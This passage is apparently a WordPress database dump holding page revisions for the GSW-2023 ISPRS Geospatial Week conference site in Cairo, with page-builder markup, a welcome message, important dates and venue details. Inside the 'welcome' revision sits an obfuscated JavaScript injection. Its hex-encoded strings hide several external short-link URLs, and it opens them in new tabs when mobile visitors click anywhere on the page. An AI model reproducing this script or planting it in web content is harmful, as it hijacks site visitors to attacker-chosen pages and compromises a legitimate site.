width=\"2/3\"][vc_raw_html]JTNDcCUyMHN0eWxlJTNEJTIydGV4dC1hbGlnbiUzQWp1c3RpZnklM0IlMjBjb2xvciUzQWJsYWNrJTNCJTIyJTNFQXMlMjB3ZSUyMGNlbGVicmF0ZSUyMG91ciUyMDUwdGglMjBhbm5pdmVyc2FyeSUyQyUyMHRoZSUyMEFyYWIlMjBBY2FkZW15JTIwZm9yJTIwU2NpZW5jZSUyQyUyMFRlY2hub2xvZ3klMkMlMjBhbmQlMjBNYXJpdGltZSUyMFRyYW5zcG9ydCUyMCUyOEFBU1RNVCUyOSUyMGlzJTIwaG9ub3JlZCUyMHRvJTIwaG9zdCUyMHRoZSUyMElTUFJTJTIwZmlyc3QlMjBHZW9zcGF0aWFsJTIwV2VlayUyMGluJTIwQWZyaWNhJTIwYW5kJTIwTWlkZGxlJTIwRWFzdCUyMGluJTIwMjAyMyUyMCUyOEdTVy0yMDIzJTI5JTIwdGhhdCUyMHdpbGwlMjBiZSUyMGhlbGQlMjB1bmRlciUyMHRoZSUyMGF1c3BpY2VzJTIwb2YlMjBILkUlMjBTZWNyZXRhcnktR2VuZXJhbCUyMG9mJTIwdGhlJTIwTGVhZ3VlJTIwb2YlMjBBcmFiJTIwU3RhdGVzLiUyMFRoZSUyMGNvbmZlcmVuY2UlMjB3aWxsJTIwYmUlMjBoZWxkJTIwaW4lMjBTZXB0ZW1iZXIlMjAyMDIzJTJDJTIwYXQlMjB0aGUlMjBJbnRlckNvbnRpbmVudGFsJTIwQ2Fpcm8lMjBDaXR5JTIwc3RhcnMlMjBDYWlybyUyQyUyMEVneXB0LiUyMEFBU1RNVCUyMHN0cm9uZ2x5JTIwYmVsaWV2ZXMlMjB0aGF0JTIwc2NpZW5jZSUyMGlzJTIwdGhlJTIwa2V5JTIwdG8lMjB0aGUlMjBmdXR1cmUlMjBhbmQlMjB0aGUlMjBjb3JuZXJzdG9uZSUyMGZvciUyMG5hdGlvbnMlMjclMjBwcm9ncmVzcyUyMGFuZCUyMHByb3NwZXJpdHkuJTIwSXQlMjBpcyUyMHRoZSUyMHByaW1hcnklMjBmYWN0b3IlMjBmb3IlMjBodW1hbiUyMGFjaGlldmVtZW50cyUyMHRocm91Z2hvdXQlMjBhbGwlMjBhZ2VzLiUyMEFBU1RNVCUyMGhhcyUyMGElMjBob3N0JTIwb2YlMjBxdWFsaWZpZWQlMjBwcm9mZXNzb3JzJTIwYW5kJTIwZXhwZXJ0cyUyMHdobyUyMGFyZSUyMGNhcGFibGUlMjBvZiUyMHN1cHBvcnRpbmclMjBBcmFiJTIwYW5kJTIwQWZyaWNhbiUyMGNvdW50cmllcyUyMGluJTIwdmFyaW91cyUyMHNjaWVudGlmaWMlMjBmaWVsZHMuJTIwVGhlJTIwR1NXJTIwd2lsbCUyMHByb3ZpZGUlMjBhJTIwcGxhdGZvcm0lMjBmb3IlMjBpbnRlcm5hdGlvbmFsJTIwc2Nob2xhcnMlMkMlMjBncmFkdWF0ZSUyMHN0dWRlbnRzJTJDJTIwZnV0dXJlJTIwc2NpZW50aXN0cyUyMGFuZCUyMGluZHVzdHJpYWwlMjBzZWN0b3JzJTIwdG8lMjBsZWFybiUyMGV4Y2hhbmdlJTIwa25vd2xlZGdlJTIwYW5kJTIwZXhwZXJpZW5jZXMlMjBvZiUyMGFwcGx5aW5nJTIwZ2Vvc3BhdGlhbCUyMHRlY2hub2xvZ2llcyUyMGZvciUyMHN1c3RhaW5hYmxlJTIwZGV2ZWxvcG1lbnQlMjBmb3IlMjBiZXR0ZXIlMjBxdWFsaXR5JTIwb2YlMjBsaWZlJTIwZm9yJTIwcGVvcGxlJTIwYXJvdW5kJTIwdGhlJTIwd29ybGQuJTIwV2UlMjB3b3VsZCUyMGxpa2UlMjB0byUyMHRha2UlMjB0aGlzJTIwb3Bwb3J0dW5pdHklMjB0byUyMHdlbGNvbWUlMjB5b3UlMjB0byUyMENhaXJvJTIwYSUyMHZpYnJhbnQlMkMlMjBleGhpbGFyYXRpbmclMkMlMjBleG90aWMlMkMlMjBmYXNjaW5hdGluZyUyMGFuZCUyMHdlbGNvbWluZyUyMGNpdHkuJTIwSG9tZSUyMHRvJTIwdGhlJTIwYmVzdCUyMFBoYXJhb25pYyUyQyUyMENvcHRpYyUyMGFuZCUyMElzbGFtaWMlMjBzaWdodHMlMjBpbiUyMEVneXB0LiUyMENhaXJvJTIwaXMlMjB3aGVyZSUyMHlvdSUyMG5ldmVyJTIwa25vdyUyMHdoYXQlMjBpbmNyZWRpYmxlJTJDJTIwaGFsZi1mb3Jnb3R0ZW4lMjBtb251bWVudCUyMHlvdSUyMG1pZ2h0JTIwc3R1bWJsZSUyMGFjcm9zcyUyMHdoaWxlJTIwd2FuZGVyaW5nJTIwYXJvdW5kLiUyMEVuam95JTIwdGhlJTIwTmlsZSUyMHZpZXclMkMlMjB2aXNpdCUyMHRoZSUyMGdyZWF0JTIwcHlyYW1pZHMlMjBvZiUyMEdpemElMkMlMjB3YWxrJTIwdGhyb3VnaCUyMHRoZSUyMGNhcGl0YWwlMjdzJTIwbWVkaWV2YWwlMjBtYXJrZXRzJTIwYnklMjBLaGFuJTIwRWwtS2hhbGlsaSUyQyUyMG9yJTIwd2FsayUyMGRvd24lMjB0aGUlMjBOaWxlJTIwcHJvbWVuYWRlLiUyMFdlJTIwbG9vayUyMGZvcndhcmQlMjB0byUyMHdvcmtpbmclMjB3aXRoJTIwdGhlJTIwSVNQUlMlMjBjb3VuY2lsJTJDJTIwY29tbWlzc2lvbnMlMjBwcmVzaWRlbnRzJTJDJTIwd29ya2luZyUyMGdyb3VwJTIwb2ZmaWNlcnMlMkMlMjBhbmQlMjBvdGhlciUyMHNpc3RlciUyMG9yZ2FuaXphdGlvbnMlMjB0byUyMGhhdmUlMjBhJTIwc3VjY2Vzc2Z1bCUyMHRlY2huaWNhbCUyMHByb2dyYW0lMjBhbmQlMjBhJTIwbWVtb3JhYmxlJTIwc29jaWFsJTIwcHJvZ3JhbS4lMjBJdCUyMGlzJTIwZ3JlYXQlMjB0byUyMGhhdmUlMjB0aGUlMjBHU1clMjBjb21pbmclMjB0byUyMEVneXB0JTIwd2hlcmUlMjBtb3N0JTIwcHJvYmFibHklMjB0aGUlMjBmaXJzdCUyMG1hcHBpbmclMjBzeXN0ZW1zJTIwd2VyZSUyMGRldmVsb3BlZCUyMDEwMDBzJTIweWVhcnMlMjBhZ28uJTIwV2VsY29tZSUyMHRvJTIwR1NXJTI3MjAyMyUyMGluJTIwQ2Fpcm8lMkMlMjBFZ3lwdC4lM0MlMkZwJTNF[/vc_raw_html][/vc_column][vc_column width=\"1/3\"][/vc_column][bsf-info-box icon_type=\"custom\" icon_img=\"id^2271|url^https://gsw2023.com/wp-content/uploads/2022/10/dr-ismael-1.png|caption^null|alt^null|title^dr-ismael|description^null\" img_width=\"100\" title=\"Prof. Ismail AbdelGhafar\" heading_tag=\"h5\" hover_effect=\"style_2\" pos=\"top\" el_class=\"accent-icon-bg\" title_font_size=\"desktop:22px;\" title_font_line_height=\"desktop:32px;\"]\n<h6><strong>President Arab Academy for Science, Technology and Maritime Transport</strong></h6>\n[/bsf-info-box][bsf-info-box icon_type=\"custom\" icon_img=\"id^2272|url^https://gsw2023.com/wp-content/uploads/2022/10/dr-naser.jpg|caption^null|alt^null|title^dr-naser|description^null\" img_width=\"100\" icon_style=\"advanced\" icon_border_spacing=\"100\" title=\"Prof. Naser El-Sheimy\" heading_tag=\"h5\" hover_effect=\"style_2\" pos=\"top\" el_class=\"accent-icon-bg\" title_font_size=\"desktop:22px;\" title_font_line_height=\"desktop:32px;\"][/bsf-info-box]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','welcome','','inherit','closed','closed','','3233-revision-v1','','','2022-11-09 21:33:16','2022-11-09 21:33:16','',3233,'https://gsw2023.com/?p=3245',0,'revision','',0),
(3246,1,'2022-11-09 21:35:08','2022-11-09 21:35:08','<p>[vc_row css=\".vc_custom_1668005747937{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text]</p>\r\n<h2 style=\"text-align: justify; color: #311b92;\"><strong> EGYPT GSW\'2023</strong></h2>\r\n<p>[rev_slider alias=\"gsw2023-1\" slidertitle=\"gsw23\"][/rev_slider]</p>\r\n<h3></h3>\r\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"right\" css=\".vc_custom_1668010492701{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668024005657{margin-top: 25px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner][vc_column_text]</p>\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\r\n<p>[/vc_column_text][/vc_column_inner][/vc_row_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668029705082{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text css=\".vc_custom_1668021106220{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\r\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\r\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper submission (Annals): March 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives): April 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives): April 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper Author notification: May 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668020788243{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][dt_default_button size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668020734563{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]SUBMIT YOUR PAPAER:SOON[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3162\" img_size=\"1149x800\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION FEES\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Opening of registration platform: soon[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\r\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\r\n<h4 style=\"text-align: justify; color: white;\"><strong>INTERCONTINENTAL CAIRO SEMIRAMIS</strong></h4>\r\n<p>&nbsp;</p>\r\n<h4 style=\"text-align: justify; color: cyan;\"><strong>MORE INFORMATION</strong></h4>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Office of the Vice President of the Academy for Graduate Studies and Scientific Research</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 